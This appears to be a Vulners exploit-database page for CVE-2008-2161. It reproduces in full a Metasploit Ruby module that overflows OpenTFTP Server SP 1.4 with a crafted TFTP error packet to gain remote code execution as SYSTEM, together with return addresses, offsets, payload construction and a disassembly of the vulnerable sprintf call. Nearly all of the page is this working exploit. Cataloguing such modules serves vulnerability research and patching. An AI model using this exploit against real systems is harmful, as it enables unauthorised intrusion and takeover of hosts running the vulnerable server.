Vulners
Lucene search
OpenTFTP SP 1.4 Error Packet Overflow
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
 | CVE-2008-2161 | 8 May 200800:00 | – | circl |
 | Update Protection against TFTP Server Error Packet Handling Buffer Overflow Vulnerability | 8 Aug 200800:00 | – | checkpoint_advisories |
| TFTP Server Error Packet Handling Buffer Overflow (CVE-2008-2161) | 18 Oct 200900:00 | – | checkpoint_advisories |
 | CVE-2008-2161 | 12 May 200822:00 | – | cve |
 | CVE-2008-2161 | 12 May 200822:00 | – | cvelist |
 | OpenTFTP SP 1.4 Error Packet Overflow | 23 Dec 201117:27 | – | metasploit |
 | CVE-2008-2161 | 12 May 200822:20 | – | nvd |
 | Buffer overflow | 12 May 200822:20 | – | prion |
| Heap overflow | 23 Dec 201923:15 | – | prion |
 | CVE-2018-10387 | 9 Jan 202612:18 | – | redhatcve |
10
`##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::Udp
def initialize(info = {})
super(update_info(info,
'Name' => 'OpenTFTP SP 1.4 Error Packet Overflow',
'Description' => %q{
This module exploits a buffer overflow in OpenTFTP Server SP 1.4. The vulnerable
condition triggers when the TFTP opcode is configured as an error packet, the TFTP
service will then format the message using a sprintf() function, which causes an
overflow, therefore allowing remote code execution under the context of SYSTEM.
The offset (to EIP) is specific to how the TFTP was started (as a 'Stand Alone',
or 'Service'). By default the target is set to 'Service' because that's the default
configuration during OpenTFTP Server SP 1.4's installation.
},
'Author' =>
[
'tixxDZ', #Initial discovery, poc
'steponequit' #Metasploit module
],
'References' =>
[
['CVE', '2008-2161'],
['BID', '29111'],
['URL', 'http://downloads.securityfocus.com/vulnerabilities/exploits/29111.pl']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 5000,
'BadChars' => "\x00\x0a\x0d",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
#.bss section that is overwritten
[ 'OpenTFTP 1.4 Service', { 'Ret' => 0x0041b3ab } ],
[ 'OpenTFTP 1.4 Stand Alone', { 'Ret' => 0x0041b3ab } ]
],
#TFTP server is installed as an NT service by default
'DefaultTarget' => 0,
'Privileged' => false,
'DisclosureDate' => 'Jul 05 2008'))
register_options(
[
Opt::RPORT(69),
], self.class)
end
def exploit
if target.name =~ /OpenTFTP 1.4 Stand Alone/
# This hits msvcrt.printf()
sploit = "\x00\x05" + make_nops(10)
sploit << payload.encoded
sploit << rand_text_alpha(20517 - payload.encoded.length)
sploit << [target['Ret']].pack('V')
sploit << Rex::Text.rand_text_alpha(1469)
elsif target.name =~ /OpenTFTP 1.4 Service/
#This hits time()
sploit = "\x00\x05" + make_nops(10)
sploit << payload.encoded
sploit << rand_text_alpha(20445 - payload.encoded.length)
sploit << [target['Ret']].pack('V')
sploit << Rex::Text.rand_text_alpha(1545)
end
# Send the malicious packet
connect_udp
udp_sock.put(sploit)
handler
disconnect_udp
end
end
=begin
NOTE: If the module is run on a OSX box, you will probably see this error:
[-] Exploit exception: Message too long
That's OSX for you.
The vulnerable condition triggers when the TFTP opcode "\x00\x05" gets parsed in a ntohs() call:
.text:004022F6 mov eax, ds:dword_41B370
.text:004022FB movzx eax, word ptr [eax]
.text:004022FE mov [esp+5C8h+var_5C8], eax
.text:00402301 mov [ebp+var_550], 0FFFFFFFFh
.text:0040230B call ntohs
.text:00402310 sub esp, 4
.text:00402313 cmp ax, 5
.text:00402317 jnz short loc_40236F
...
When the value matches 0x05, we then head down to a sprinf() function to generate an error
message, which causes an overflow:
.text:00402330 mov eax, ds:dword_41B370
.text:00402335 add eax, 4
.text:00402338 mov [esp+5C8h+var_5BC], eax
.text:0040233C mov [esp+5C8h+var_5C0], edx
.text:00402340 mov [esp+5C8h+var_5C4], offset aErrorIAtClient ; "Error %i at Client, %s"
.text:00402348 mov [esp+5C8h+var_5C8], offset byte_41B394
.text:0040234F call sprintf
And then we either corrupt a msvcrt.printf() or time() call (in logMess), which end up gaining
control.
In source:
http://pastebin.com/QgZDwcan
else if (ntohs(datain->opcode) == 5) // Line 224
{
sprintf(serverError.errormessage, "Error %i at Client, %s", ntohs(datain->block), &datain->buffer);
logMess(req1, 1);
..... so on .....
You can also corrupt a SetServiceStatus() call with a smaller buffer, but obviously doesn't
give you a better crash than this one.
=end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
24 Dec 2011 00:00Current
0.6Low risk
Vulners AI Score0.6
EPSS0.78902